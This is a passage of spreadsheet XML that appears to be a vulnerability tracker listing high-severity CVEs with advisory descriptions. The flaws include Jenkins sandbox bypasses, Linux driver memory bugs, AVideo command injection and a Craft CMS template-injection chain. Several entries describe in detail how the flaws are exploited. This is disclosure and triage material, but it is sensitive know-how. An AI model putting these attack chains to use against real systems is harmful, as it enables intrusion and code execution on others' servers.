both a heap OOB read of wps_ie, and, more seriously, a stack buffer
overflow at several call sites where buf_attr is a single-byte
stack variable, e.g. rtw_get_wps_attr_content()'s callers passing
WPS_ATTR_SELECTED_REGISTRAR into a stack "u8 sr"/"u8
selected_registrar" (drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c,
drivers/staging/rtl8723bs/core/rtw_mlme_ext.c). A crafted WPS IE in a
beacon or probe response processed during scanning can therefore
smash the stack of the parsing thread.
rtw_get_wps_attr_content() itself has no independent length check
and simply trusts the attr_len it gets back from rtw_get_wps_attr(),
so fixing the bound here also fixes that caller.
The "attr_ptr + 4 &gt; wps_ie + wps_ielen" header check above was added
by commit 1463ca3ec6601 ("staging: rtl8723bs: fix OOB reads in
rtw_get_sec_ie(), rtw_get_wapi_ie(), and rtw_get_wps_attr()"), which
bounded the fixed header but never extended the check to cover the
variable-length attribute data that follows it. Add that missing
check before attr_len is used as a memcpy() length or accepted as a
match.</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90018</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90041</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: sony: clean up device list on probe failure
sony_input_configured() adds some controllers to sony_device_list before
HID core registers their input devices. input_register_device() can fail
after the callback returns successfully. sony_probe() then observes that
HID_CLAIMED_INPUT is clear and unwinds, but only stops the HID hardware.
The devres-managed sony_sc is freed while its list node remains linked, so
the next matching controller traverses freed memory.
Initialize the list node and device ID to inactive states. Make list
removal idempotent and run the driver-private cleanup on every probe
failure path. This also makes a second cleanup safe when
sony_input_configured() already unwound a partial initialization before
sony_probe() handles the missing input claim.
Found by 0sec (https://0sec.ai) using automated source analysis;
verified against the HID input registration and probe unwind paths.</t>
        </is>
      </c>
      <c r="S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90041</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92122</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not check the method called through the proxy created when a sandboxed script coerces a value to an interface, if the value inherits a method of the same name as an interface method, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92122</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92123</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not intercept operations performed on a null receiver (method calls, property and attribute accesses, and array accesses), allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92123</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92124</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier checks the operations Groovy will perform with the elements it reads from a collection that a sandboxed script casts to another type but performs the cast on the collection itself, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92124</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92125</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not reject the @GroovyASTTransformationClass annotation, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to run an arbitrary AST transformation at compile time, bypassing the sandbox protection and executing arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92125</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92137</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>Jenkins Robot Framework Plugin 6.2.2 and earlier does not check that the archive directory configured for Robot Framework report files is contained within the build directory on the Jenkins controller, allowing attackers with Item/Configure permission to create or replace arbitrary files on the Jenkins controller file system with attacker-specified content, which can lead to remote code execution.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92137</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92466</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains a missing authorization vulnerability where the zlt.security.auth.urlPermission.enable flag defaults to false, disabling all permission checks after authentication. Authenticated users with no roles can access administrative APIs including user management, role assignment, and Elasticsearch index operations by bypassing the disabled authorization enforcement.</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92466</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92566</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>DataGear through 6.0.0 contains a server-side request forgery vulnerability in the /dataSet/preview/Http endpoint that allows unauthenticated attackers to execute arbitrary HTTP requests by supplying a caller-controlled URI. Attackers can issue GET, POST, PUT, PATCH, or DELETE requests to internal endpoints and cloud metadata services, receiving full response bodies without authentication or validation.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92566</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92580</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>In AVideo through 29.0, the CloneSite plugin is vulnerable to stored OS command injection. In plugin/CloneSite/cloneClient.json.php (line ~270) the stored SSH password is substituted into the command string `sshpass -p '{password}' rsync ...` with a plain str_replace and no escaping, so a single quote in the password breaks out of the quoted word and injects arbitrary shell. The password is written through the admin-only endpoint objects/pluginAddDataObject.json.php, whose only CSRF defense (isUntrustedRequest()/forbidIfIsUntrustedRequest()) is a no-op when the request source appears to be loopback — as happens behind a same-host TLS-terminating reverse proxy with $global['trustedProxies'] unset — or when an attacker-controlled application is co-hosted on the same hostname; on HTTPS the session cookie is issued with SameSite=None, so a cross-site POST carries it. An unauthenticated remote attacker can therefore lure an authenticated administrator into planting a malicious password (and an attacker-controlled cloneSiteURL), after which the plugin's documented crontab entry executes the injected command with no further administrator action, as the crontab owner (commonly root or www-data). Exploitation requires the CloneSite plugin to be enabled with the documented crontab installed and one of the above CSRF channels; default single-process Apache deployments are reported as not CSRF-exploitable. This is a residual sink of CVE-2026-41304. The issue is confirmed at master HEAD (8963b6a1); no patched version is available.</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92580</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92592</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 4.8.0 through 4.18.5 and 5.0.0 through 5.10.12 sign an authenticated user's attacker-controlled license-shun cookie with the same key and format used to validate signed redirect parameters, because the HMAC signature is not bound to its purpose (Yii's cookieValidationKey is derived from the same Craft securityKey used for signed request parameters). An authenticated, non-administrator user (Control Panel access is not required) can set the cookie via the license-shun endpoint and transplant the signed envelope into the redirect parameter; on a successful login, Craft validates the signature and renders the authenticated bytes as an unsandboxed Twig template, where Twig's map filter accepts a string callback and allows PHP system() to execute arbitrary operating-system commands as the web-server user. Exploitation requires an account using password authentication without active 2FA, the default request configuration, and availability of PHP system(). The issue is fixed in 4.18.6 and 5.10.13.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92592</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92593</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions 5.10.0 through 5.10.12 contain an incomplete fix for CVE-2026-55794: the Controller::getPostedRedirectUrl() -&gt; View::renderObjectTemplate() sink remained unsandboxed, and the same fix commit added a self-signing oracle in Cp::elementLabelHtml(). Because Craft/Yii HMAC tokens are not bound to a parameter name, an authenticated low-privilege control panel user with edit rights on a single element type can mint a token over attacker-controlled Twig for the returnUrl parameter and replay it as the redirect POST parameter, reaching the unsandboxed sink and achieving server-side template injection that executes arbitrary PHP code (full server compromise). The issue is fixed in 5.10.13.</t>
        </is>
      </c>
      <c r="S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92593</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92748</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>BC Security Empire before 6.7.1 fails to validate the multipart filename parameter in upload endpoints, allowing authenticated operators to write files to arbitrary paths on the C2 server. Attackers can use path traversal sequences in the filename to bypass directory containment and write malicious files to sensitive locations for code execution.</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92748</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92761</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>WebVirtCloud fails to properly validate permission flags in UserInstance grants, allowing view-only users to perform privileged actions. Attackers with read-only grants can power off virtual machines, reset root passwords, install SSH keys, and manage ISO images by exploiting the get_instance gate that only checks grant existence.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92761</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92762</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>Pelican Panel versions before 1.0.0-beta35 enforce startup write permissions only through disabled form controls rather than server-side authorization checks. Attackers with startup.read permission can craft Livewire state updates to invoke afterStateUpdated callbacks and modify startup commands, docker images, and variables to execute arbitrary commands in the container.</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92762</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92780</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>KnowStreaming through 3.4.1 fails to enforce role-based access control on REST API endpoints, allowing any authenticated user to access protected functionality. Attackers can call identity-management endpoints to create administrator accounts or grant themselves administrative privileges without proper authorization.</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92780</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92788</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
